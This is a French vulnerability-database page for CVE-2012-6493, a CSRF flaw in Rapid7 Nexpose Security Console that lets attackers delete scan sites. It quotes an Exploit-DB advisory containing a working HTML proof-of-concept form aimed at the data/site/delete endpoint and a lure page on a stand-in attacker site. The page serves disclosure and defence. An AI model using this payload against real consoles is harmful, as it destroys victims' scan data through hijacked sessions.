CVE-2012-6493 : Détail

CVE-2012-6493

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
0.39%V4
Network
2014-02-04
16h00 +00:00
2014-02-04
15h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Cross-site request forgery (CSRF) vulnerability in Rapid7 Nexpose Security Console before 5.5.4 allows remote attackers to hijack the authentication of unspecified victims for requests that delete scan data and sites via a request to data/site/delete.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 23924

Date de publication : 2013-01-05 23h00 +00:00
Auteur : Robert Gilbert
EDB Vérifié : Yes

Product: Nexpose Security Console Vendor: Rapid7 Version: < 5.5.3 Tested Version: 5.5.1 Vendor Notified Date: December 19, 2012 Release Date: January 2, 2013 Risk: High Authentication: None required Remote: Yes Description: Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Nexpose Security Console 5.5.3 and below allow remote attackers to submit actions on a legitimate user’s behalf. By not properly checking each URL, an attacker can execute requests on behalf of a legitimate user. If an authenticated user is tricked into visiting a specially crafted page, it may be possible to perform user-initiated actions on the web application using the victim’s established session. Successful exploitation of this vulnerability resulted in deleting scan data and sites during the proof-of-concept. Exploit steps for proof-of-concept: 1. Create an external site/page: http://attackersite.com/nexpose-csrf.htm that contains: [code] <html> <!-- Nexpose CSRF PoC --> <body> <form action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1" method="POST" enctype="multipart/form-data"> <input type="submit" value="delete site" /> </form> <script> //document.forms[0].submit(); //uncomment to auto-submit </script> </body> </html> [/code] 2. Lure victim to http://attackersite.com/nexpose-csrf.htm. 3. Site with ID 1 is deleted when form is submitted. Vendor Notified: Yes Vendor Response: Quickly escalated and resolved. Vendor Update: Remediated in 5.5.4. Reference: CVE-2012-6493 https://community.rapid7.com/docs/DOC-2065#release5 https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) Credit: Robert Gilbert HALOCK Security Labs

Products Mentioned

Configuraton 0

Rapid7>>Nexpose >> Version To (including) 5.5.3

Rapid7>>Nexpose >> Version 5.4

Rapid7>>Nexpose >> Version 5.4.1

Rapid7>>Nexpose >> Version 5.4.2

Rapid7>>Nexpose >> Version 5.4.3

Rapid7>>Nexpose >> Version 5.4.4

Rapid7>>Nexpose >> Version 5.4.5

Rapid7>>Nexpose >> Version 5.4.6

Rapid7>>Nexpose >> Version 5.4.7

Rapid7>>Nexpose >> Version 5.4.8

Rapid7>>Nexpose >> Version 5.4.9

Rapid7>>Nexpose >> Version 5.4.10

Rapid7>>Nexpose >> Version 5.4.11

Rapid7>>Nexpose >> Version 5.4.12

Rapid7>>Nexpose >> Version 5.5.1

Références

http://www.exploit-db.com/exploits/23924
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/88923
Tags : vdb-entry, x_refsource_OSVDB